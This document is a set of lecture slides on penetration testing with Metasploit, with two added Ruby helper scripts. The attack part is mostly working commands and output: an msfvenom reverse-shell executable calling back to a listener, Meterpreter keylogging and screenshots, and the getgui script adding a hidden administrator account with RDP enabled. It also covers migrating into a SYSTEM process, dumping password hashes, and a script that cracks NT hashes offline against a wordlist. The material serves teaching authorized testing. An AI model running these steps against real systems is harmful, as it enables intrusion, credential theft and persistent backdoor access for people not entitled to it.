Metasploit
Understand how a Pen Tester can generate exploits for known vulnerabilities and test them using the Metasploit framework.
Define the options and payloads required to generate and use exploits.
Gaining remote access.
Prof Bill Buchanan, http://asecuritysite.com, @billatnapier
Author: Prof Bill Buchanan
Metasploit
Introduction
Vulnerability Threats
Pen Testing
Technical scan for vulnerabilities (e.g. Nessus)
Business scan for vulnerabilities (e.g. human)
White Hat
Adversarial Role: Social Engineering. Password Cracking. Data Theft.
Automated Testing: Port scanning. Malware detection. SQL Database Exploits.
Risks: Adverse Disclosure; Service Availability; Business Disruption; Damage to or Modification of Assets; Fraud/E-Crime; Reputational Damage; Legal and Regulatory Censure.
Threats: Malware; Hacking; Social; Misuse; Physical; Error; Environmental.
Actor: Internal; External; Trusted Partner.
Vulnerability Threats
Pen Testing (adversarial role expanded)
Adversarial Role: Denial of Service; User Account Breach; Password Cracking; Physical Attack; Database Breach; Email Breach; SNMP Breach; Malware Install; Web Compromise; Backdoor Install; Spyware Install; SCADA Compromise; VoIP Compromise; Cloud Compromise.
Vulnerability Threats: CVE-2014-0515
CVE-ID: CVE-2014-0515
Description: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
Published: April 2014
CVSS v2 base score: 9.3 (HIGH)
http://www.cve.mitre.org
Metasploit Framework
Running msfconsole
Metasploit
Vulnerability (CVE)
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...
[ASCII-art banner]

Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]
+ -- --=[ 1388 exploits - 866 auxiliary - 236 post ]
+ -- --=[ 342 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
Workflow: vulnerability analysis -> generate exploit (exploit generator, the Kali host) -> run against the host under test.
Running msfconsole
msf > search CVE-2014-0515

Matching Modules
================

   Name                                                  Disclosure Date  Rank    Description
   ----                                                  ---------------  ----    -----------
   exploit/windows/browser/adobe_flash_pixel_bender_bof  2014-04-28       normal  Adobe Flash Player Shader Buffer Overflow

msf > info exploit/windows/browser/adobe_flash_pixel_bender_bof

       Name: Adobe Flash Player Shader Buffer Overflow
     Module: exploit/windows/browser/adobe_flash_pixel_bender_bof
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-04-28

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Retries  false            no        Allow the browser to retry the module
  SRVHOST  0.0.0.0          yes       The local host to listen on.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:
  Space: 2000

Description:
  This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8.

References:
  http://cvedetails.com/cve/2014-0515/
Running msfconsole
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.200.0.208 LPORT=4444 -f exe > winexp.exe

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.200.0.208
LHOST => 10.200.0.208
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 10.200.0.208:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.200.0.205
[*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500

The payload given to msfvenom and the payload set on the handler must be the same. windows/meterpreter/reverse_tcp is staged: the executable only contains the stager, and the handler sends the Meterpreter stage (the 770048-byte transfer above) once the connection arrives. A stageless payload such as windows/shell_reverse_tcp connects to a plain TCP listener instead and would not consume that stage.
WINEXP.EXE
Gaining Admin Access
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
hel <Ctrl> <LCtrl>
meterpreter > keyscan_stop

meterpreter > execute -f calc.exe
Process 3780 created.

meterpreter > screenshot
Screenshot saved to: /root/zJVqTTaq.jpeg

meterpreter > getuid
Server username: Encase-PC1\Encase

meterpreter > sysinfo
Computer        : ENCASE-PC1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_GB
Meterpreter     : x86/win32

meterpreter > getsid
Server SID: S-1-5-21-3026846657-1272420173-2154099446-1000

meterpreter > ifconfig

Interface 13
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:ab:68:00
MTU          : 1500
IPv4 Address : 10.200.0.205
IPv4 Netmask : 255.255.255.0
Remote Desktop
meterpreter > run getgui -u newuser -p pass
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Setting user account for logon
[*] Adding User: newuser with Password: pass
[*] Hiding user from Windows Login screen
[*] Adding User: newuser to local group 'Remote Desktop Users'
[*] Adding User: newuser to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4028.rc

meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez [email protected]
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4353.rc

[*] 10.200.0.205 - Meterpreter session 3 closed. Reason: User exit
msf exploit(handler) > exit

root@kali:~# rdesktop -u newuser -p pass 10.200.0.205
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Each getgui run writes its own clean-up resource script (one for the hidden administrator account, one for the RDP, service and firewall changes). Run both at the end of the engagement so the target is left without a backdoor account and with its original RDP configuration.
Gaining Admin Access (migrate and hashdump)
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > getuid
Server username: Encase-PC1\Encase

hashdump fails here because the session runs as the local user Encase; reading the SAM hashes needs SYSTEM, which is obtained by migrating into a SYSTEM-owned process.

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch    Session  User                          Path
 ---   ----  ----              ----    -------  ----                          ----
 0     0     [System Process]          4294967295
 4     0     System            x86_64  0
 264   4     smss.exe          x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 364   524   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 372   364   csrss.exe         x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 388   524   spoolsv.exe       x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 420   364   wininit.exe       x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 524   420   services.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 532   420   lsass.exe         x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 540   420   lsm.exe           x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 632   524   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 708   524   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 788   524   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 832   524   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 856   524   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
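Choosing which PID to migrate into is the decision the slide makes by hand (PID 832). The Ruby script below is an added example, not part of the slides or of Metasploit: it parses a `ps` listing (PS_OUTPUT is constructed from the process list printed above) and applies selection rules that are this example's own assumptions: the target must run as the wanted user (SYSTEM here), in session 0, with the wanted architecture, must not be the current process (2436 on the slide) and must not be one of the processes whose death blue-screens the box or that defenders watch closely (smss, csrss, wininit, services, lsass, lsm, winlogon).

```ruby
# Added example (not from the slides): pick a migration target from
# Meterpreter's `ps` listing. PS_OUTPUT is constructed from the process list
# printed on the slide; the selection rules below are this example's own.
PS_OUTPUT = <<~'PS'
  PID   PPID  Name              Arch    Session  User                          Path
  ---   ----  ----              ----    -------  ----                          ----
  0     0     [System Process]          4294967295
  4     0     System            x86_64  0
  264   4     smss.exe          x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
  364   524   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
  372   364   csrss.exe         x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
  388   524   spoolsv.exe       x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
  420   364   wininit.exe       x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
  524   420   services.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
  532   420   lsass.exe         x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
  540   420   lsm.exe           x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
  632   524   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
  708   524   svchost.exe       x86_64  0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
  788   524   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
  832   524   svchost.exe       x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
  856   524   svchost.exe       x86_64  0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
PS

# One row of `ps`. User and Path are optional because kernel-side entries
# (System, [System Process]) print without them; rows without an Arch column
# cannot be migrated into and are dropped by the parser.
ROW = /\A(?<pid>\d+)\s+(?<ppid>\d+)\s+(?<name>.+?)\s+(?<arch>x86_64|x64|x86)\s+(?<session>\d+)(?:\s+(?<user>.+?))?(?:\s+(?<path>[A-Za-z]:\\.*?))?\s*\z/

def parse_ps(text)
  text.each_line.map do |line|
    m = ROW.match(line.strip)
    next unless m
    { pid: m[:pid].to_i, ppid: m[:ppid].to_i, name: m[:name], arch: m[:arch],
      session: m[:session].to_i, user: m[:user], path: m[:path] }
  end.compact
end

# Never inject into these: they are critical (killing one blue-screens the
# box) or heavily monitored, whatever user they run as. Denylist is an
# assumption of this example.
CRITICAL = %w[system smss.exe csrss.exe wininit.exe services.exe lsass.exe lsm.exe winlogon.exe].freeze

# Candidates: owned by the wanted user, in the wanted session, matching
# architecture, not the current process and not on the critical list.
def migration_candidates(rows, current_pid:, want_user: "NT AUTHORITY\\SYSTEM",
                         want_arch: "x86_64", want_session: 0)
  rows.select do |r|
    r[:pid] != current_pid &&
      r[:user] == want_user &&
      r[:arch] == want_arch &&
      r[:session] == want_session &&
      !CRITICAL.include?(r[:name].downcase)
  end.sort_by { |r| r[:pid] }
end

if __FILE__ == $PROGRAM_NAME
  rows = parse_ps(PS_OUTPUT)
  # 2436 is the PID the slide's session was running in before migrating.
  migration_candidates(rows, current_pid: 2436).each do |r|
    puts format("migrate %-5d  %-12s %s", r[:pid], r[:name], r[:path])
  end
end
```

On the slide's listing the rules leave spoolsv.exe (388) and the two SYSTEM svchost.exe instances (632, 832); the slide picks 832. Session 0 is right for reaching SYSTEM and the SAM, but not for the earlier keyscan_start and screenshot commands: those need a process attached to the user's interactive desktop (explorer.exe in the user's session), so the target you migrate into depends on what you intend to do next.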
meterpreter > migrate 832
[*] Migrating from 2436 to 832...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
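Reading the hashdump output is the next step a tester takes, and the slide leaves it to the reader. The Ruby script below is an added example, not part of the slides or of Metasploit: it parses the pwdump-style lines (HASHDUMP is constructed from the three lines printed above), flags accounts whose NT hash is the hash of the empty password, reports whether an LM hash is stored at all, and runs a small dictionary check by computing NT hashes itself (MD4 over the UTF-16LE password, implemented in pure Ruby so the script does not depend on OpenSSL still shipping the legacy MD4 digest). The wordlist is constructed; the Encase password is not on the page and is not guessed.

```ruby
# Added example (not from the slides): interpret Meterpreter hashdump output.
# HASHDUMP is the dump printed on the slide, reproduced here as sample input.
HASHDUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DUMP

MASK32 = 0xffffffff

def rotl(x, n)
  ((x << n) | (x >> (32 - n))) & MASK32
end

# Pure-Ruby MD4 (RFC 1320). Returns the lowercase hex digest of the bytes.
def md4(data)
  msg = data.dup.force_encoding(Encoding::BINARY)
  bit_len = msg.bytesize * 8
  msg << "\x80".b
  msg << "\x00".b while msg.bytesize % 64 != 56
  msg << [bit_len & MASK32, (bit_len >> 32) & MASK32].pack("V2")   # 64-bit LE length

  f = ->(x, y, z) { (x & y) | (~x & z & MASK32) }
  g = ->(x, y, z) { (x & y) | (x & z) | (y & z) }
  h = ->(x, y, z) { x ^ y ^ z }
  state = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476]

  msg.bytes.each_slice(64) do |blk|
    x = blk.pack("C*").unpack("V16")
    r = state.dup
    # Step i updates register (-i mod 4), reading the other three in order,
    # which reproduces the [ABCD] [DABC] [CDAB] [BCDA] rotation of the RFC.
    step = lambda do |i, fn, k, s, const|
      a, b, c, d = (-i) % 4, (1 - i) % 4, (2 - i) % 4, (3 - i) % 4
      r[a] = rotl((r[a] + fn.call(r[b], r[c], r[d]) + x[k] + const) & MASK32, s)
    end
    16.times { |i| step.call(i, f, i, [3, 7, 11, 19][i % 4], 0) }
    16.times { |i| step.call(i, g, (i % 4) * 4 + i / 4, [3, 5, 9, 13][i % 4], 0x5a827999) }
    16.times { |i| step.call(i, h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15][i], [3, 9, 11, 15][i % 4], 0x6ed9eba1) }
    state = state.zip(r).map { |s, t| (s + t) & MASK32 }
  end
  state.pack("V4").unpack1("H*")
end

# NT hash: unsalted MD4 over the UTF-16LE encoding of the password.
def nt_hash(password)
  md4(password.encode(Encoding::UTF_16LE))
end

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee" # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0" # nt_hash("")

# user:rid:lm:nt::: lines -> hashes with the two facts a tester wants first.
def parse_hashdump(text)
  text.each_line.map do |line|
    user, rid, lm, nt = line.strip.split(":")
    next unless nt && nt.length == 32
    { user: user, rid: rid.to_i, lm: lm.downcase, nt: nt.downcase,
      empty_password: nt.downcase == EMPTY_NT,
      lm_stored: lm.downcase != EMPTY_LM }
  end.compact
end

# Offline dictionary check: hash each candidate once, look the dump up in it.
def crack(entries, wordlist)
  lookup = wordlist.each_with_object({}) { |w, h| h[nt_hash(w)] = w }
  entries.each_with_object({}) do |e, found|
    found[e[:user]] = lookup[e[:nt]] if lookup.key?(e[:nt])
  end
end

if __FILE__ == $PROGRAM_NAME
  entries = parse_hashdump(HASHDUMP)
  entries.each do |e|
    puts format("%-14s rid=%-4d empty_password=%-5s lm_stored=%s", e[:user], e[:rid], e[:empty_password], e[:lm_stored])
  end
  p crack(entries, ["", "password", "pass", "s3cr3t"])   # constructed wordlist
end
```

What the slide's dump tells you once parsed: no account has an LM hash stored (the LM field is the fixed empty value on every line, as expected on Windows 7), and Administrator and Guest both carry the empty-password NT hash. hashdump does not show whether an account is enabled, and on a default Windows 7 install both of those built-in accounts are disabled, so check the account state (for example `net user Administrator` through a shell) before assuming a blank password or the hash itself will log you in; the Encase hash is the one worth cracking or passing.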
Metasploit
Understand how a Pen Tester can generate exploits for known vulnerabilities and test them using the Metasploit framework.
Define the options and payloads required to generate and use exploits.
Understand how to test a range of devices/instances.
Using shells and callbacks.
Prof Bill Buchanan, http://asecuritysite.com, @billatnapier